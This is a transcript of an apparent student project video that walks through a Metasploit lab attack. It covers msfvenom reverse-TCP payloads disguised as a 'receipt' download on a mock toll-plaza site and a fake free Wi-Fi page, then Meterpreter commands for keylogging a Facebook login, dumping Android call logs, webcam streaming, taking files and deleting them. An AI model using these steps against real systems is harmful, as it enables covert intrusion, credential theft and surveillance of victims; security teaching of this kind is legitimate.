Hello. So I'm going to start presenting the project for uh, compromising security of Windows 10 and Android and doing their bit as well. So on the screen are the credentials of the team. Basically, the project discusses the various benefits of using Metasploit. So Metasploit is nothing but another open source framework tool which is used for testing the vulnerability of different systems, be that Windows or Android or any iOS system. So the project A in this project, we will demonstrate the attack on Windows 10 system and using another machine, Kali Linux, on from the VirtualBox. The Metasploit is basically a framework which consists of MSF Venom and Meterpreter Listener. Meterpreter Listener is the thing in which we'll be using to control the victim's device. MSF Venom is another part of Metasploit which will help us create a payload for the intrusion. Uh, this here is the flowchart and the working model of Metasploit, our project. As I said, that we will be creating a payload using MSF Venom, and then we'll copy the payload in a certain way, maybe that online or offline, onto the victim system. And then we will start using our meter listener, and we will execute some commands for controlling the victim's PC and the Android phone. So this video will be in three parts. Number one, first I'll show you how to create the payload. The second part will consist of how we are going to deploy that payload into the victim's computer or Android phone using uh, a website that we only made. And the third part would be the meterpreter listener, in which we will show you that how we will be going to control the victim's PC and the victim's mobile phone. So I'll just move to the Kali Linux. So this is the virtual box. I'm running Kali Linux on virtual box. So simply I'm going to open the terminal. The first thing that we need to do is we have to go for ifconfig to know the IP address. This is my IP address in Kali Linux system. The Kali Linux system might, when you will be running on VirtualBox, it may or may not show that your Kali Linux won't be able to connect to the internet. But don't worry about it. You have to go to devices and network. We just open network settings, and this option must be NAT over here. But you just have to select the bridged adapter over here and select OK and just restart your Kali Linux. So just type for ifconfig and you will be knowing your uh, your IP address of the internet connection over which we will be attacking. So let's cut to the chase and start creating our payload for I'll be creating two payloads, one for Windows and another one for Android. So I'll just give the command. Firstly, I'm going to create for Android. So we just have to this dash b understand gives us an idea about what type of file we are creating. This is going to be a payload file. So I'm going to create it for Android, and we will be doing a reverse TCP attack on the network. So we have given the L port, L host, and the L port. L host is the IP address of the network, and you can either choose L port as 4444 and or 4455. And I'm going to name my file as andro.apk. This is going to generate a 10,000 bytes of data. So just hit enter, and as we see that this on the desktop itself, this andro.apk file is being created. The payload size is 10,000 bytes. And now we are going to do the same for Windows as well. Let's create both of them at once so that it doesn't uh, we don't have to quit the MeterPritter server and we can directly start the exploit payload thing. So here is the command for Windows. It is similar to the Android one. We just have to change Windows over here. And here we are going to give the name as exploit.exe. I have already created one payload over here. So I'll just name it something else. Its name is exp.exe. And we are going to name it something else. Because I am going to name it something more relatable in this video. So let's make it receipt.exe, and that's it. We just have to hit enter, and another payload for Windows will be created. We can see that another payload is being created. Now these are the two payloads that we are going to insert into our website's database so that the victims that are on the similar network to mine can download these, and they are going, once they download this or try to open this, so they will be under my PC's control. So that this is all for the part one. Now I will say, you guys will be hearing Riddhi's voice. She will be telling how we are going to insert these two payloads into a vulnerable website, and how the user will be downloading them, opening them, and I'll get back to you in the third part. Thank you.
The online toll plaza system that we have created in order to attack the system. So basically what happens is that whenever, as we have just seen, that we have created the virus payload on the Kali Linux system, and now all we have to do is that whenever on like highways and all, whenever a user wants to log in and create a receipt for the toll plaza, as it is an online toll plaza, whenever he goes and tries to log in, so let me just log in. Yes, so this is the dashboard that we have created. Whenever he goes to add receipt for his trip, he'll just go and choose whatever he wants, like 4-wheeler, lane number 1, vehicle name, let's say Wagoner, then let's say owner name Riddhi, then vehicle number 0747, then vehicle city, let's say Delhi, then let's say one-way trip to, and cost is, let's say, 500 rupees. So what happens is that the user can see here directly that there's an option to add and download the receipt. So obviously he'll just go and click on it. What happens is that a virus payload accesses a virus payload, but with the name of receipt it gets saved, so he won't matter that much and he'll just save it. So what happens is that he'll just simply click on it and tries to open it. But what happens is that, as we know, nothing open, as this is the virus payload that we have created. But what happens is that to our Kali Linux now is now connected to the system. So this is the one possibility. Another possibility we have also created for our system is that to attack is that we all know there's a free Wi-Fi on toll plaza, on airports, everything. So what happens is that we have created this demo free website for Vodafone. So simply what the user needs to do is that it shows welcome to the free Wi-Fi page of Vodafone. In order to get your credentials for Wi-Fi, click on the button below. So obviously he'll try to get his credentials. He'll click here, and again the virus payload with the name of receipt gets saved, and he'll try to open it for in order to get the credentials. So this is the part of the system. There are different options on the website here as well, for user and for staff as well. Let me show you for the staff as well. So if instead of a user, a staff tries to log in, let's now go to the staff part. If staff tries to log in, So let's say a staff tries to now add the receipt for the user. He'll go here, he'll choose the lane that the user is. Let's say the vehicle name is Mercedes, owner name is again Prithvi, 0737, vehicle number 0745, vehicle city, let's say is registered on Delhi, trip to one-way trip, will cost less than $1,000. So if the staff also goes and tries to download the receipt for the user, then again the receipt is downloaded, and again the staff here can now click on it, and he'll be directed to the Kali Linux platform that we have created. So this is about the website that we have created and how we can attack the system of a well-built organization. Not only this, we'll now be showcasing how to attack on a well-built organization with the help of Vedant system. This is a Windows system. Now we'll look at the Vedant's Kali Linux system. So we'll move to that part. Thank you, sir.
So we were processing the Metasploit framework, and once, as you have seen, that from an online source we can easily download our own created payload, and since it has been created and it's been downloaded into the victim's PC, as you can see, this is the victim's PC, and here it is downloaded, and I have saved this on the desktop of the victim's PC. And this is system, this is the Windows 10 system, and this will be used as our victim's device. And we are here at our Kali Linux system. So over here, as both the payloads for Android and Windows has been launched, I'm just going to give the command for an open MSF console, so that soon it will start the Metasploit console with Meterpreter. We see the Metasploit console is over here. As we can see, this is MSF6 version. So we are going to start our reverse engineering attack. We are just going to open a multi-handler which is inbuilt inside the Metasploit framework. We'll just give the command use exploit /multi/handler, and here we are going to set our payload for Windows, because we are going for Windows first. So we just have to give the command set payload Windows/Meterpreter/reverse TCP attack, and we just hit enter. Now we are going to select and set our host ID, which was the host that we set up while creating the payload. On this IP address only we are going to do the reverse TCP attack. Now we are going to set our L port, which is 4455. For Windows we set our L port as 4455, but for Android we set it for 4444. So we are just going to hit the command exploit, and it will start making connection. As you can see, only the reverse TCP handler or 192.162.29.26:4455, it is sending signals to this system. But unless and once the user or the victim tries to open this receipt, we see that here the connection gets established automatically. So this PC is currently now fully under the hacker's control. So we are just going to, for instance, let me show you. I'll just type a simple command of screenshot. This is going to take the command. This is going to take the in the victim's computer's screenshot. I'll just hit enter, and we see that there is this file created automatically. This is a JPEG file, and this is the screenshot of the window which is right open in front of me over here. One of the most amazing thing, the most important thing is we used an insecure website to download a payload virus, and now we can
get into any sort of accounts or any sort of secure to most secure websites as we want. So here I am going to start the key scan. I'll just give the command key scan underscore start, and this will start recording the key of the victim's PC. So here on the victim's PC I am going to type Facebook login and hit enter, and I'm going to go for login. Here I'm going to type Vedant, and I'll just hit tab for the password, and I'll just give the password as 12345. Let me show this to you. Coming back to the victim system, we have given the command the key scan underscore start. I am just going to give the command key scan underscore dump. We see that these are the credentials. Once we did the key scan dot dump, we first of all we typed Facebook login, then we hit enter. We clicked on a link and typed username as Vedant, and then we hit tab, and then we typed the password. So this is how easy, like, so secure websites like Facebook, these can be scanned via our payload virus. Unfortunately, I do not have a webcam on my on this Windows 10 PC, so I have made another payload for Android, which is soon I'm going to show that how it works. And for instance, we can also find out a lot of n number of commands. You just have to type help, and we can see there are a lot of systems which I can do to basically all the controls are in my hand now. I'm just going to type ls to let's see the directories. So as you can see that on my desktop, this victim's PC's desktop, this is trial.txt. it's a text file. I'm just going to save this, and we see that here it is saved over here. There are number of files over here, and once I typed ls over here, it gave me all the files that are available on the desktop of the victim system. Also, if we want to know what the system is built on, what OS is it working on, like we know very well that it is Windows, but what if we want to know that which version of Windows is it running on, or what is the configuration of the PC? So we just go and hit the command sysinfo and see that it is x86. It's a 64-bit laptop, it's a 64-bit computer, and it is working on Windows 7 version of Windows OS. Another thing that we can do is we can just download any file that is available on the victim's PC. I told you about the trial.txt file, so I'm just going to download trial. Make sure we give the correct name and the correct extension. We hit trial.txt. So as I showed you on with the victim's PC, it was this file, and now it is on my desktop of Kali Linux. I'm just going to open it. We see it is the same content that is written on the txt file which was in my PC. Also, we can do one more thing. Let's see that if we have downloaded this file, can we delete the file from the victim's PC as well? So I'm just going to give the command delete, that is del, and give the name of the file. We see that here it is there, but as soon as I hit enter from the Kali Linux, it is deleted from here. And the most amazing thing is we can do a live screen share and see what the user is doing currently. See, let's I'm going to open Chrome once again. I see. Let's open another tab. It gets opened over here also. I'm going to open WhatsApp over here, and I see WhatsApp over there, WhatsApp over here. So it's a simple screen share that we can see. I'm just going to close this one, and we'll just press Ctrl C, so that it stops the screen share. Still, if we want to go and see what screen share is going, we can just click on this icon to see the previously recorded screen, or to continue watching the screen share. And last but not the least, we can just type here shutdown, and hit enter. We are just going to give the command shutdown. Hit enter, and we see the system gets shut down. Hello, so we are back with the another part of Metasploit framework. Now we are going to do the same with the Android over here, using the Kali Linux system that we were using for Windows as well. So we are just going to open MSF console over here, and I want to show you that from the previous website only, from which we downloaded the receipt.exe, we also created another payload for Android as well, which was an APK part. So I'm just going to open the file browser, and I'm going to show you where the this one is stored. For the Android, we created andro.apk, as we remember, and here is android.apk. so if the user just clicks on this and install the given payload, it will create an icon over here which will show the main activity. So we're just going to keep this at a side, and now I'll do the same, that we will be opening our multi-handler using exploit multi-handler. We are going to set the payload this time for Android. You can see last time we used set payload windows/meterpreter/reverse TCP. Now we are using the Android. So this will give our Kali Linux system to know that which payload we are talking about. So we are just again going to set the IP address, that is 192.168.29.26, on which this Android and the Kali Linux is working. Just we are going to set up the L port as 4444, because for Android we set the port for 4444, and for Windows we did as 4455. So there's nothing much to do now. We can type exploit, and we see that it has started connecting to the Android, and as soon as we click on this, it gets connected. So apparently this Android is now connected to the PC, and we can do a lot of stuff. So I'm just going to tell you that okay, let me open the messages for you. There are no messages currently, but let's see on call logs. See, there are number of call logs in this phone. So for instance, let's try and dump all these call logs into our Kali Linux system. We just type dump call log, and we can see that here the call log txt file has been created. We can see the number 9424357765, and on the Android as well this was the same number, and all the contacts that were over here on the call log, each and every contact has been saved. Since this the Android phone is not pursuing any SIM card or any other connection of that sort, so I cannot show you how to use the calling in the messaging system. Otherwise we can do the same. Okay, now we are going to see, let's see. Okay, another thing is we can see the system over here is at the sound mode. So we're just going to type help and see how to change that. So we are going to type set audio mode. We hit enter. I'm just going to do this, give 2 over here. Let's try with 1. Let's try with 0. So as soon as I hit enter, the profile turned to mute over here. Now let's do it with 1. Now we can see the sound mode is turned to sound. Now for you, let me just press the down button and turn the ringtone over to 0.2. So if I do 2 over here, we see, and hit enter, the ringer must be at the maximum mode. We see that it was at the maximum without touching the phone. Another thing is we can see that what are the apps that are already over here. So I'm just gonna type app list. App list command is very important because here we will be knowing that which app is pursuing what is the package name of which app. So let's see, let us go for something very simple. Okay, so we see that here is the YouTube app and this is the package name of YouTube. I'm just going to copy this and I'm just going to paste it. First I'll write app_run, give the space and hit and paste the package of YouTube, hit enter, and I see the YouTube that started over here. Another thing, we'll try this once again. Let's go for something very inbuilt apps like, okay, let's go for calculator. I'll just type app_run, then I'll paste it, hit enter. We see the calculator opens up. Now what we are going to do is, I'm just going to close this. I'm just going to hold my phone in this direction. So here we are pointing the back camera of the Android phone to the periodic table over there, and here I'm just going to give the command webcam _stream and hit enter. It will start streaming and it will be visible on our screens. We can see, and even if we move the phone a little to the laptop that we are working on like this, it will keep moving. It's because of the internet it is lagging a little bit, but for sure it will be lagging. So we can just close it over here as well. We can just press Ctrl C and exit that webcam stream. Another thing that we can do is we can, as we see that this is all the apps we can see over here. So let's go and try to uninstall a app, or since if we have somehow penetrated other payload viruses, we can also install them by only if the user has installed any one of the packages. So we just have to give the command as app install, give the space and give the package name, which will appear over here. So let's just go and try to uninstall YouTube itself. we see that the command over here pops up, do you want to replace this app with the factory version, because YouTube cannot be uninstalled. So we'll just cancel this for now. And similar to Windows, we can access files that are present on this PC and on this Android phone. So that's all about Metasploit. Thank you.